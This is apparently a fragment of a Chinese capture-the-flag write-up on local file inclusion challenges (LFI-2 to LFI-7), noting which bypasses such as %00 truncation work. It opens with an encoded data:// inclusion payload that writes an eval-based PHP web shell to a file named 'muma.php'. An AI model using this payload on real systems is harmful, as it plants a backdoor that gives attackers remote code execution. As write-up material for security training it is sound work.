P3BhZ2U9ZGF0YTovL3RleHQvcGxhaW4sPD9waHAgZnB1dHMoZm9wZW4oJ211bWEucGhwJywndycpLCc8P3BocCBAZXZhbCgkX1BPU1RbaC10LW1dKT8%2bJyk7Pz4%3d LFI 所以本题与 LFI-2 基本一致了,不过根据提示,本题无法使用 %00 进行绕过。 图片 如果只是想包含 PHP 脚本文件的话,正好省得写后缀名就好了。 图片 LFI-7 本题与 LFI-2 基本一致,也是换成了 POST 方法传递参数,所以做法依旧。